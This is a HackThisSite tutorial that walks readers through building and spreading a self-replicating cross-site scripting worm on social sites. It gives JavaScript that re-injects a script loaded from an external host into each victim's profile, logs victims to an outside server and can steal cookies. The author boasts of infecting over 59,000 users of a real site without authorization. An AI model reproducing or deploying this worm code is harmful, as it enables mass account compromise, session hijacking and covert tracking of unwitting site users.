"Political freedom is a society's safety valve, allowing the passionately critical a nonviolent way to express their dissatisfaction with the status quo." --David Cole
This is going to be a basic, real world example of an XSS worm at work. I found the power of the XSS worm maybe 9 months ago when i started learning ajax and i realized i could use it with js injection. The results are phenomenal, ill share my story after the tutorial!
**STEP 1**
Find a site where exploiting would work with a worm. XSS worms need alot of people in order to spread properly.
Learn the basics of java<b></b>script, XSS, and AJAX. It will help you understand everything as i didn't go into a whole lot of detail.
**STEP 2**
Find an insecure input on the site. Anyplace you see inputs try inserting some java<b></b>script and see if it is vulnerable. XSS worms rely on java<b></b>script so without it the worm wont work. A good test would be something like:
<script>alert('XSS')</script>
obviously it can be much deeper than just that, but thats a good first step. Read some articles on js injection for more about finding the hole.
**STEP 3**
Decide what you want your worm to do. You can have it steal cookies, or maybe overwrite pages to try finding anything you may desire. I personally just do it for shits and giggles and just have a cookie stealer (which is usually a useless session id, read about session hijacking too) and counter on mine. The cookie stealer pretty much does nothing except log a timestamp to the users. Most sites use sessions to store data, not just cookies, but if they do use cookies you have a lot more control and access to information :).
Time to explain how they work. You use java<b></b>script (and php or other scripting language to log anything). You need to somehow find a page vulnerable to xss and the page has to be able to be seen by other people browsing the site. For the most part, anything found in user control panels, etc wont work. What will work would be something like a profile page (like myspace) or a forum.
You then need to use some way (AJAX) to replicate a set of code. For example, lets say a user on myspace is logged in, views your profile page, and is now infected with the worm. When they viewed your profile page, the ajax script would have sent info in the background to change the profile of the person logged in to contain the same java<b></b>script code. Then this person's profile is infected with the worm and anyone that views that profile is infected, and it goes on as a contiguously cycle. Also note the benefit of using ajax is not only the ability to hide all functions in the background, but it allows you to send POST requests whereas a redirect sending get variables is more noticeable and many forms may not accept it.
The biggest problem below is the injected input will probably be seen if its an input a user can change. You can use your creativity with js/html to find places people will never suspect the js code to be hidden. You can also include the js from an external site, or have all the js injected directly onto the page using the worm. I personally like using an external site because you can change what the js does and/or stop the worm if you choose to do so, where you other wise could not. After finding the hole, usually hiding the code from users/administrators is the hardest part.
**STEP 4**
Understanding the java<b></b>script code to use (read the code comments). This page would be http://themostbasic.nonhidden/formofincludingjs
CODE :
function createCookie(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires;
} // create a cookie
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
} // read a cookie
var qcd = readCookie('fake'); /* you need a way so when a user already infected views the page they don't get the worm again. Their are other ways of doing this, but i figure since you have access to js on the site, why not create cookies on the site :-p. If you are worried about someone noticing a cookie that doesn't normally exist on their system, just change the method used */
if( qcd != "592570942") // if the cookie doesn't exist, insert the worm.
{
var inject = "<script src='http://themostbasic.nonhidden/formofincludingjs'></script>";
if (window.ActiveXObject){
var http = new ActiveXObject("Microsoft.XMLHTTP");
} // this will only work on IE users, search ajax to learn how to make this code cross-browser compatable.
http.open("GET", "http://www.site.com/vulnerablepage.php?injectionvariable="+inject, true);
http.onreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
tell = http.responseText;
}
}
http.send(null);
http.close;
new Image().src='http://externalsite.com/logger.php?redirect=thispage'; // this is optional, it will send the user to an external site to log information. If you know how, do this without redirecting and in the background alog with the ajax to make it 100% hidden.
createCookie('fake','592570942','25');
}
**STEP 5**
Try in a controlled environment please. I take no responsibility for your actions, this was created to spread knowledge, don't destroy something good. Anyway this is some really powerful code here. I created a worm on gaiaonline.com on their profiles and it really was amazing. Using code similar to the above, but not as plain, I created a worm that started from my account to over 59,000 people in 3 days! The text file storing the timestamp and user number reached somewhere around 50MB or more (I really don't remember). It reached a point where the web host would not let me access the text file due to file size limits! Have fun!
Please leave feedback, this is my first article!
Cast your vote on this article 10 - Highest, 1 - Lowest
Comments: Published: 19 comments.
HackThisSite is the collective work of the HackThisSite staff, licensed under a CC BY-NC license.
We ask that you inform us upon sharing or distributing.
